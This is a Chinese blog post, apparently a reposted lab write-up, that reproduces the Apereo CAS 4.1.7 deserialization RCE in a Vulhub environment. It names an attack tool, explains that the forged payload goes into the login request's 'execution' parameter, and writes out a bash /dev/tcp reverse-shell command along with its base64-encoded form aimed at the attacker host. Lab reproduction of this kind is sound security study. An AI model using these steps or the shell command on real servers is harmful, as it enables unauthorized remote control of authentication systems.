点击上方蓝字,发现更多精彩
Apereo CAS 4.1
反序列化RCE漏洞
01
漏洞简述
Apereo CAS是企业级单点登录系统。CAS试图通过Apache Commons Collections库对对象进行反序列化的过程中存在一个问题,该案例引起了RCE漏洞。Apereo Cas一般是用来做身份认证的,所以有一定的攻击面,漏洞的成因是因为key的默认硬编码,导致可以通过反序列化配合Gadget使用。
02
影响版本
Apereo CAS <= 4.1.7
03
测试环境
目标机:192.168.234.128
攻击机:192.168.234.129
04
漏洞复现
Vulhub搭建->访问http://192.168.234.128:8080/cas/login->成功
1、利用apereo-cas-attack-1.0-SNAPSHOT-all.jar工具
生成payload
2、抓取登录接口数据包修改execution
参数为生成的payload
3、成功创建
4、反弹shell
/bin/bash -i > /dev/tcp/xx.xx.xx.xx/6666 0<&1 2>&1
需要base64编码
bash -c {echo,L2Jpbi9iYXNoIC1pID4gL2Rldi90Y3AvMTkyLjE2OC4yMzQuMTI5LzY2NjYgMDwmMSAyPiYx}|{base64,-d}|{bash,-i}
生成payload
进行攻击
反弹成功
05
参考链接
https://www.cnblogs.com/cute-puli/p/14648859.html
关注我
获得更多精彩
坚持学习与分享,麻烦各位师傅文章底部给点个“再看”,感激不尽
如侵权请私聊公众号删文
原文始发于微信公众号(渗透Xiao白帽):{Vulhub漏洞复现(二) Apereo CAS}
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论